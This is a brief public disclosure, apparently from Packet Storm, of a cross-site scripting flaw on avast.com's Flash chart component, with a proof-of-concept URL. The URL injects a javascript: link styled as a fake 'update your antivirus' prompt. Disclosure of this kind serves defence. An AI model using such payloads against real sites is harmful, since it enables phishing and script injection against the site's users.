Avast.com suffers from a cross site scripting vulnerability. This was sent to Packet Storm anonymously and was reported to the vendor. The vendor has not addressed the issue for months so it is being disclosed publicly in order to shed light on the issue.
1c3a06c072fae66bc640f5b7d482bbf52f72ae43fd03ae40a890739e3abdc7e3
XSS proof of concept:
http://www.avast.com/amcolumn/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a href="javascript:confirm('An attacker can include malicious code here.')">Click here to update your antivirus</a>]]></message></chart>&.swf